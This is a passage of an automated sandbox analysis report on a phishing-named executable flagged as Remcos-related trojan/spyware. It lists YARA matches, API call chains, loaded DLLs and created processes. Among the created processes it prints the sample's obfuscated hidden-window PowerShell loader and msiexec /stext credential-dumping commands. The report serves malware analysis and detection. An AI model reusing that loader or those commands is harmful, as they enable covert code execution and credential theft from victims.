              Source: Yara match | File source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              Source: initial sample | Static PE information: Filename: RFQ NO 65-58003.exe
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00401806 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_004016FD NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_004068DA
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_00404CED
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_21217194
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_2120B5C1
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00416760 appears 69 times
              Source: RFQ NO 65-58003.exe | Static PE information: invalid certificate
              Source: RFQ NO 65-58003.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@28/20@1/4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_00402104 CoCreateInstance
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | File created: C:\Users\user\AppData\Roaming\afdragsordning
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | File created: C:\Users\user\AppData\Local\Temp\nsx559.tmp
              Source: RFQ NO 65-58003.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\msiexec.exe | System information queried: HandleInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 0000000E.00000002.3407952469.0000000021650000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 00000011.00000002.2924013215.0000000004962000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: RFQ NO 65-58003.exe | Virustotal: Detection: 13%
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | File read: C:\Users\user\Desktop\RFQ NO 65-58003.exe
              Source: C:\Windows\SysWOW64\msiexec.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
              Source: unknown | Process created: C:\Users\user\Desktop\RFQ NO 65-58003.exe "C:\Users\user\Desktop\RFQ NO 65-58003.exe"
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi"
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi"
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: oleacc.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: riched20.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: usp10.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: msls31.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
